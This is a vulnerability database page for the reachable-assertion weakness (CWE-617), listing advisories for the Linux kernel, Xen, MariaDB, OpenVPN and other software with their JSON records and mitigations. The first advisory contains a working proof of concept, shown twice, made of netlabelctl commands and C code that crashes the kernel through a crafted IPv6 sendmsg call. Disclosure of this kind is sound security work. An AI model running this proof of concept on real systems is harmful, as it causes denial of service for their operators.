Common Weakness Enumeration

CWE-617

Allowed

Reachable Assertion

Abstraction: Base · Status: Draft

The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.

989 vulnerabilities reference this CWE, most recent first.

GHSA-HJPX-F2R6-RR4Q

Vulnerability from github – Published: 2026-01-13 18:31 – Updated: 2026-07-14 15:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom.

PoC: Using netlabelctl tool:

    netlabelctl map del default
    netlabelctl calipso add pass doi:7
    netlabelctl map add default address:0::1/128 protocol:calipso,7

    Then run the following PoC:

    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

    // setup msghdr
    int cmsg_size = 2;
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
                    sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

    sendmsg(fd, &msg, 0);
Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-71085"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-13T16:16:08Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n        netlabelctl map del default\n        netlabelctl calipso add pass doi:7\n        netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n        Then run the following PoC:\n\n        int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n        // setup msghdr\n        int cmsg_size = 2;\n        int cmsg_len = 0x60;\n        struct msghdr msg;\n        struct sockaddr_in6 dest_addr;\n        struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n                        sizeof(struct cmsghdr) + cmsg_len);\n        msg.msg_name = \u0026dest_addr;\n        msg.msg_namelen = sizeof(dest_addr);\n        msg.msg_iov = NULL;\n        msg.msg_iovlen = 0;\n        msg.msg_control = cmsg;\n        msg.msg_controllen = cmsg_len;\n        msg.msg_flags = 0;\n\n        // setup sockaddr\n        dest_addr.sin6_family = AF_INET6;\n        dest_addr.sin6_port = htons(31337);\n        dest_addr.sin6_flowinfo = htonl(31337);\n        dest_addr.sin6_addr = in6addr_loopback;\n        dest_addr.sin6_scope_id = 31337;\n\n        // setup cmsghdr\n        cmsg-\u003ecmsg_len = cmsg_len;\n        cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n        cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n        char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n        hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n        sendmsg(fd, \u0026msg, 0);",
  "id": "GHSA-hjpx-f2r6-rr4q",
  "modified": "2026-07-14T15:31:31Z",
  "published": "2026-01-13T18:31:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71085"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HJV5-8XV5-VMFP

Vulnerability from github – Published: 2024-05-21 15:31 – Updated: 2025-05-12 21:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

memory: fsl_ifc: fix leak of IO mapping on probe failure

On probe error the driver should unmap the IO memory. Smatch reports:

drivers/memory/fsl_ifc.c:298 fsl_ifc_ctrl_probe() warn: 'fsl_ifc_ctrl_dev->gregs' not released on lines: 298.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-47315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-21T15:15:18Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: fsl_ifc: fix leak of IO mapping on probe failure\n\nOn probe error the driver should unmap the IO memory.  Smatch reports:\n\n  drivers/memory/fsl_ifc.c:298 fsl_ifc_ctrl_probe() warn: \u0027fsl_ifc_ctrl_dev-\u003egregs\u0027 not released on lines: 298.",
  "id": "GHSA-hjv5-8xv5-vmfp",
  "modified": "2025-05-12T21:30:55Z",
  "published": "2024-05-21T15:31:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47315"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/28f71fd81ebd3b386bf5c7c5539664156f7d72c1"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/3b132ab67fc7a358fff35e808fa65d4bea452521"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/6b3b002de90738e3c85853a682ce7e0fa078d42b"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/83af5816308b490b05fc8fa27fc1bdc769df200a"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8d071d270afba468708faca5f7b6d9e656f75e27"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/94bc2fe46102d1e060fc749c0c19511e76c9995f"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/b7a2bcb4a3731d68f938207f75ed3e1d41774510"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/bd051b3e184fa56eeb6276ee913ba4d48069024b"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d0d04b95e8ed0223844a1d58497c686fe2e4a955"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d9213d4f372d30b5bc4d921795d6bed0c0e3eebf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HMXP-GVHP-8X2H

Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42
VLAI
Details

There is a reachable assertion in the Internal::TiffReader::visitDirectory function in tiffvisitor.cpp of Exiv2 0.26 that will lead to a remote denial of service attack via crafted input.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11683"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-27T06:29:00Z",
    "severity": "MODERATE"
  },
  "details": "There is a reachable assertion in the Internal::TiffReader::visitDirectory function in tiffvisitor.cpp of Exiv2 0.26 that will lead to a remote denial of service attack via crafted input.",
  "id": "GHSA-hmxp-gvhp-8x2h",
  "modified": "2022-05-13T01:42:28Z",
  "published": "2022-05-13T01:42:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11683"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1475124"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00013.html"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3852-1"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/100030"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HV7F-MHVH-6MF6

Vulnerability from github – Published: 2026-03-23 09:30 – Updated: 2026-03-23 15:30
VLAI
Details

Any guest issuing a Xenstore command accessing a node using the (illegal) node path "/local/domain/", will crash xenstored due to a clobbered error indicator in xenstored when verifying the node path.

Note that the crash is forced via a failing assert() statement in xenstored. In case xenstored is being built with NDEBUG #defined, an unprivileged guest trying to access the node path "/local/domain/" will result in it no longer being serviced by xenstored, other guests (including dom0) will still be serviced, but xenstored will use up all cpu time it can get.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23555"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-23T07:16:07Z",
    "severity": "HIGH"
  },
  "details": "Any guest issuing a Xenstore command accessing a node using the\n(illegal) node path \"/local/domain/\", will crash xenstored due to a\nclobbered error indicator in xenstored when verifying the node path.\n\nNote that the crash is forced via a failing assert() statement in\nxenstored. In case xenstored is being built with NDEBUG #defined,\nan unprivileged guest trying to access the node path \"/local/domain/\"\nwill result in it no longer being serviced by xenstored, other guests\n(including dom0) will still be serviced, but xenstored will use up\nall cpu time it can get.",
  "id": "GHSA-hv7f-mhvh-6mf6",
  "modified": "2026-03-23T15:30:44Z",
  "published": "2026-03-23T09:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23555"
    },
    {
      "type": "WEB",
      "url": "https://xenbits.xenproject.org/xsa/advisory-481.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/03/17/7"
    },
    {
      "type": "WEB",
      "url": "http://xenbits.xen.org/xsa/advisory-481.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HVCG-67F3-52CF

Vulnerability from github – Published: 2025-08-11 09:30 – Updated: 2025-08-11 09:30
VLAI
Details

A vulnerability was determined in JasPer up to 4.2.5. Affected by this issue is the function jpc_floorlog2 of the file src/libjasper/jpc/jpc_enc.c of the component JPEG2000 Encoder. The manipulation leads to reachable assertion. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 79185d32d7a444abae441935b20ae4676b3513d4. It is recommended to apply a patch to fix this issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8836"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-11T08:15:26Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was determined in JasPer up to 4.2.5. Affected by this issue is the function jpc_floorlog2 of the file src/libjasper/jpc/jpc_enc.c of the component JPEG2000 Encoder. The manipulation leads to reachable assertion. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 79185d32d7a444abae441935b20ae4676b3513d4. It is recommended to apply a patch to fix this issue.",
  "id": "GHSA-hvcg-67f3-52cf",
  "modified": "2025-08-11T09:30:37Z",
  "published": "2025-08-11T09:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jasper-software/jasper/issues/401"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jasper-software/jasper/commit/79185d32d7a444abae441935b20ae4676b3513d4"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1pPgndhHh2z0lk99Wt31W-XIW3XWt8FB3/view?usp=drive_link"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.319370"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.319370"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.622409"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HWWG-2JMX-C78Q

Vulnerability from github – Published: 2026-06-26 21:32 – Updated: 2026-07-08 06:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

drm/amd/display: Wrap DCN32 phantom-plane allocation in DC_RUN_WITH_PREEMPTION_ENABLED

[Why] dcn32_validate_bandwidth() wraps dcn32_internal_validate_bw() with DC_FP_START()/DC_FP_END(). In x86 non-RT, DC_FP_START takes fpregs_lock(), which disables local softirqs.

The DML1 path through dcn32_enable_phantom_plane() calls kvzalloc() to allocate ~335 KiB for dc_plane_state. This triggers the vmalloc path, which calls BUG_ON(in_interrupt()) because it's invoked within the FPU-enabled (softirq disabled) region, leading to a kernel crash.

[How] Wrap the dc_state_create_phantom_plane() call with the DC_RUN_WITH_PREEMPTION_ENABLED() macro to allow preemption during this memory allocation.

(cherry picked from commit 885ccbef7b94a8b38f69c4211c679021aa27ad11)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-53285"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-26T20:17:21Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Wrap DCN32 phantom-plane allocation in DC_RUN_WITH_PREEMPTION_ENABLED\n\n[Why]\ndcn32_validate_bandwidth() wraps dcn32_internal_validate_bw() with\nDC_FP_START()/DC_FP_END(). In x86 non-RT, DC_FP_START takes fpregs_lock(),\nwhich disables local softirqs.\n\nThe DML1 path through dcn32_enable_phantom_plane() calls kvzalloc() to\nallocate ~335 KiB for dc_plane_state. This triggers the vmalloc path,\nwhich calls BUG_ON(in_interrupt()) because it\u0027s invoked within the\nFPU-enabled (softirq disabled) region, leading to a kernel crash.\n\n[How]\nWrap the dc_state_create_phantom_plane() call with the\nDC_RUN_WITH_PREEMPTION_ENABLED() macro to allow preemption during\nthis memory allocation.\n\n(cherry picked from commit 885ccbef7b94a8b38f69c4211c679021aa27ad11)",
  "id": "GHSA-hwwg-2jmx-c78q",
  "modified": "2026-07-08T06:31:35Z",
  "published": "2026-06-26T21:32:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53285"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/183182235f6d53bac62c6c39014738a54a68dfa6"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/30bb2ec6695d62f63db4aa6179c4626834ed0cd6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HX5H-H8M3-HVW4

Vulnerability from github – Published: 2022-07-02 00:00 – Updated: 2022-07-12 00:00
VLAI
Details

MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table->get_ref_count() == 0 in dict0dict.cc.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-32082"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-01T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table-\u003eget_ref_count() == 0 in dict0dict.cc.",
  "id": "GHSA-hx5h-h8m3-hvw4",
  "modified": "2022-07-12T00:00:55Z",
  "published": "2022-07-02T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32082"
    },
    {
      "type": "WEB",
      "url": "https://jira.mariadb.org/browse/MDEV-26433"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WCOEGSVMIEXDZHBOSV6WVF7FAVRBR2JE"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTVAONAZXJFGHAJ4RP2OF3EAMQCOTDSQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZHISY4YVO4S5QJYYIXCIAXBM7INOL4VY"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220818-0005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J2QW-QC29-MH5C

Vulnerability from github – Published: 2022-12-13 18:30 – Updated: 2022-12-15 18:30
VLAI
Details

Denial of service in Modem due to reachable assertion while processing the common config procedure in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-25692"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-13T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "Denial of service in Modem due to reachable assertion while processing the common config procedure in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables",
  "id": "GHSA-j2qw-qc29-mh5c",
  "modified": "2022-12-15T18:30:24Z",
  "published": "2022-12-13T18:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25692"
    },
    {
      "type": "WEB",
      "url": "https://www.qualcomm.com/company/product-security/bulletins/december-2022-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J34C-6692-HX97

Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-09-21 00:00
VLAI
Details

OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-36382"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617",
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-04T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service.",
  "id": "GHSA-j34c-6692-hx97",
  "modified": "2022-09-21T00:00:37Z",
  "published": "2022-05-24T19:04:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36382"
    },
    {
      "type": "WEB",
      "url": "https://openvpn.net/security-advisory/access-server-security-update-cve-2020-15077-cve-2020-36382"
    },
    {
      "type": "WEB",
      "url": "https://openvpn.net/vpn-server-resources/release-notes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J37Q-3XJR-5589

Vulnerability from github – Published: 2025-03-26 21:31 – Updated: 2025-03-31 15:30
VLAI
Details

atop through 2.11.0 allows local users to cause a denial of service (e.g., assertion failure and application exit) or possibly have unspecified other impact by running certain types of unprivileged processes while a different user runs atop.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-31160"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-26T21:15:23Z",
    "severity": "LOW"
  },
  "details": "atop through 2.11.0 allows local users to cause a denial of service (e.g., assertion failure and application exit) or possibly have unspecified other impact by running certain types of unprivileged processes while a different user runs atop.",
  "id": "GHSA-j37q-3xjr-5589",
  "modified": "2025-03-31T15:30:39Z",
  "published": "2025-03-26T21:31:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31160"
    },
    {
      "type": "WEB",
      "url": "https://blog.bismuth.sh/blog/bismuth-found-the-atop-bug"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Atoptool/atop"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=43477057"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=43485980"
    },
    {
      "type": "WEB",
      "url": "https://rachelbythebay.com/w/2025/03/26/atop"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/03/26/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/03/27/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/03/27/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/03/27/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/03/29/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)

Mitigation
Implementation

Strategy: Input Validation

Perform input validation on user data.

No CAPEC attack patterns related to this CWE.